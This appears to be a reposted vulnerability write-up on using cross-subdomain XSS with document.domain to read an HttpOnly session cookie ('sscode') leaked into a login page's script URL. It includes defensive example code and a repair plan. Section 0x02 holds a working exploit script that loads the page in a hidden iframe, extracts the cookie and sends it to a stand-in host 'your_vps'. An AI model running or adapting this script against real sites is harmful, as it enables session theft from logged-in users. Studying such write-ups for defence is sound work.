Get httponly protected cookies across sub domains through XSS

Xiaoxiang Xin'an 2022-06-24 07:30:43 Reads: 426


Statement: Most of the content on this official account comes from the author's daily notes; a few articles are reproduced with the permission of the original author or other official accounts. Unauthorized reprinting is strictly prohibited; if you want to reprint, get in touch first. Do not use the techniques in this article for illegal testing; the author and the official account bear no responsibility for any adverse consequences arising from it.

0x01 Introduce

Cross-subdomain access:

Because of the browser's same-origin policy, only pages with the same scheme, domain name and port can interact with each other; otherwise the browser refuses. Take two pages, at and respectively: they are on different domain names, so they cannot interact. However, the code below (both pages set document.domain to the same parent domain) puts them in the same domain, and cross-subdomain interaction becomes possible.



As for HttpOnly: in short, it adds a layer of protection to a cookie. document.cookie will not return a cookie that was set with the HttpOnly attribute.
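The same-origin relaxation described above is what the rest of the write-up relies on, so here is a small model of the browser's rules, added as an example that is not part of the original post. It checks origins strictly, then shows how setting document.domain on both pages to a common parent domain makes them same-origin, which setter values a browser rejects (an unrelated domain, a public suffix), and how the Origin-Agent-Cluster: ?1 response header disables the setter. The hostnames (a.example.com and so on) and the tiny public-suffix list are constructed for the example.

```javascript
// Added example (not from the original post): a model of the same-origin check
// before and after both pages relax document.domain.
// Hostnames such as a.example.com are constructed; PUBLIC_SUFFIXES stands in
// for the real public suffix list.

// Split a URL into its origin tuple: scheme, host, port (default port filled in).
function originOf(url) {
  const u = new URL(url);
  const port = u.port || (u.protocol === "https:" ? "443" : "80");
  return { scheme: u.protocol, host: u.hostname, port };
}

// Strict same-origin policy: scheme, host and port must all match.
function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// A page: its origin, the domain it has set via document.domain (if any),
// and whether it was served with Origin-Agent-Cluster: ?1.
function makePage(url, { originAgentCluster = false } = {}) {
  return { origin: originOf(url), effectiveDomain: null, originAgentCluster };
}

// Rules a browser applies to `document.domain = value`:
//  - the Origin-Agent-Cluster header disables the setter entirely,
//  - value must not be a public suffix (toy list here),
//  - value must equal the current host or be a parent domain of it.
const PUBLIC_SUFFIXES = new Set(["com", "net", "org", "co.uk"]);

function setDocumentDomain(page, value) {
  if (page.originAgentCluster) {
    return { ok: false, reason: "blocked by Origin-Agent-Cluster: ?1" };
  }
  if (PUBLIC_SUFFIXES.has(value)) {
    return { ok: false, reason: "public suffix" };
  }
  const host = page.origin.host;
  if (host !== value && !host.endsWith("." + value)) {
    return { ok: false, reason: "not a parent domain of " + host };
  }
  page.effectiveDomain = value;
  return { ok: true };
}

// Relaxed check: script access is allowed only when BOTH pages have set
// document.domain to the same value and the schemes match (port is ignored).
// If neither has set it, the strict comparison applies.
function canScriptAccess(a, b) {
  if (a.effectiveDomain === null && b.effectiveDomain === null) {
    return sameOrigin(a.origin, b.origin);
  }
  return a.effectiveDomain !== null &&
    a.effectiveDomain === b.effectiveDomain &&
    a.origin.scheme === b.origin.scheme;
}

// Walk through the write-up's scenario with constructed hosts.
function demo() {
  const xssPage = makePage("https://a.example.com/vuln");
  const loginPage = makePage("https://b.example.com/login-success");
  const before = canScriptAccess(xssPage, loginPage);      // false: different hosts

  setDocumentDomain(xssPage, "example.com");
  const oneSided = canScriptAccess(xssPage, loginPage);    // false: only one side relaxed
  setDocumentDomain(loginPage, "example.com");
  const after = canScriptAccess(xssPage, loginPage);       // true: both relaxed to the same domain

  // Hardened login page: served with Origin-Agent-Cluster: ?1, so the setter fails.
  const hardened = makePage("https://b.example.com/login-success", { originAgentCluster: true });
  const blocked = !setDocumentDomain(hardened, "example.com").ok;
  return { before, oneSided, after, blocked };
}

console.log(demo());
```

The practical consequence for defenders: a page that holds anything sensitive should be served with Origin-Agent-Cluster: ?1 so that no sibling subdomain can opt into the same domain, and recent Chromium releases refuse the document.domain setter by default unless a site explicitly opts back in.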

0x02 Vulnerability details

First, using the browser devtools (F12), look at the key cookie sscode: it is set with HttpOnly.

Since the server must send sscode to the client after login, the next step is to walk through the login flow and look for a flaw.

Enter the account and password and click login.

The server sends sscode to the client via Set-Cookie.

The browser moves to the login success page.

Note that another request is sent after this, and its response contains sscode (this screenshot is from after the fix, so sscode is encrypted).

Where does this request come from? Look at the Referer in the request header.


It comes from the login success page. There is no X-Requested-With header, so it should be a request issued from the src attribute of some HTML tag. Go to the login success page to confirm.

Search the page for sscode and locate the script tag: it is indeed requested through the src attribute value.

So an XSS vulnerability in the same domain can be used to read the response content of the login success page and then extract sscode from it.

The login page is the following link:

At first, the domain name was, so I wanted an XSS on, but could not find one after looking around. Later I checked document.domain on the login success page, which shows the domain it belongs to is. That means an XSS in any subdomain can be used to get across the HttpOnly protection of sscode.

Using a search syntax I found an XSS and wrote the exp as follows.

document.domain = ''; // set the same domain (value elided in the original)
var iframe = document.createElement("iframe");
iframe.src = ''; // the login success page (URL elided in the original)
iframe.style.cssText = "width:0%;height:0%;"; // not visible, for concealment (style assignment reconstructed from the garbled line)
iframe.onload = function(){
    var content = iframe.contentDocument || iframe.contentWindow.document; // get the iframe page's document
    var scr = content.getElementsByTagName('script'); // all script tags
    var str = scr[3].src; // the script tag whose src carries sscode
    var re = /%22sscode%22%3A%22(.+)%22%2C%22cookie_expire/; // regular expression
    var sscode = str.match(re)[1]; // extract sscode
    var image = new Image();
    image.src = 'http://your_vps/' + '?sscode=' + sscode; // send sscode out
};
document.body.appendChild(iframe); // attach the frame so that it loads and onload fires

Finally, load the malicious JS file through the XSS and send the link to the victim: as long as the victim is logged in, opening the link leaks their sscode.

0x03 Repair plan

The root cause of this vulnerability is that sscode is leaked into the login success page. The best fix is of course not to expose it on the page at all, but because of the vendor's business needs it could not be removed from the page, so the fix was to encrypt it.
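The leak is easy to miss in review because the cookie value does not appear in document.cookie, only inside a URL the page loads. Below is an added check (not from the original post or the vendor) that a reviewer or CI job can run against a login flow: it takes the Set-Cookie headers from the login response and the HTML of the page that follows, and reports any HttpOnly cookie whose value appears in a src or href attribute (raw or percent-encoded, as in the JSON-in-a-query-string case above) or anywhere else in the markup. The cookie names, values and HTML are constructed sample data; it also generalizes the page's case by scanning every src/href, not just script tags.

```javascript
// Added example (not from the original post): flag HttpOnly cookies whose
// value is echoed into the page that follows login. All sample data is constructed.

// Parse Set-Cookie headers into {name, value, httpOnly}.
function parseSetCookie(headers) {
  return headers.map((h) => {
    const [pair, ...attrs] = h.split(";").map((s) => s.trim());
    const eq = pair.indexOf("=");
    return {
      name: pair.slice(0, eq),
      value: pair.slice(eq + 1),
      httpOnly: attrs.some((a) => a.toLowerCase() === "httponly"),
    };
  });
}

// Pull every src= / href= value out of the markup (a regex is enough for a
// review check; a production tool would use an HTML parser).
function extractUrls(html) {
  const re = /\b(?:src|href)\s*=\s*["']([^"']+)["']/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Percent-decode repeatedly (bounded) so double-encoded values are also caught.
function fullyDecode(s) {
  let prev = s;
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(prev); } catch { return prev; }
    if (next === prev) return prev;
    prev = next;
  }
  return prev;
}

// Returns one entry per leaked HttpOnly cookie: where it was found and, for
// attribute leaks, the offending URL.
function findCookieLeaks(setCookieHeaders, html) {
  const leaks = [];
  const urls = extractUrls(html);
  for (const c of parseSetCookie(setCookieHeaders)) {
    // Only HttpOnly cookies matter here; very short values would give false positives.
    if (!c.httpOnly || c.value.length < 8) continue;
    const hit = urls.find((u) => fullyDecode(u).includes(c.value));
    if (hit !== undefined) {
      leaks.push({ cookie: c.name, where: "url", url: hit });
    } else if (fullyDecode(html).includes(c.value)) {
      leaks.push({ cookie: c.name, where: "body" });
    }
  }
  return leaks;
}

// Constructed sample: a session cookie marked HttpOnly, and a success page
// whose init script carries that same value, percent-encoded inside JSON.
const SAMPLE_SET_COOKIE = [
  "sscode=ABCDEF0123456789; Path=/; HttpOnly; Secure",
  "theme=dark; Path=/",
];
const SAMPLE_HTML = `<html><body>
<script src="/static/app.js"></script>
<script src="/api/init?data=%7B%22sscode%22%3A%22ABCDEF0123456789%22%2C%22cookie_expire%22%3A3600%7D"></script>
<a href="/settings?theme=dark">settings</a>
</body></html>`;

function demo() {
  return findCookieLeaks(SAMPLE_SET_COOKIE, SAMPLE_HTML);
}

console.log(demo());
```

Run it as part of an authenticated crawl of the login flow; a non-empty result means the HttpOnly flag is not actually protecting that cookie, whichever subdomain the attacker's script runs in. Encrypting the value, as the vendor did, makes this check pass, but the more robust fix remains not sending the session identifier anywhere except the Cookie header.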

Source of the article: CSDN blog. Original address:

Copyright: author [Xiaoxiang Xin'an]. Please include the original link when reprinting, thank you.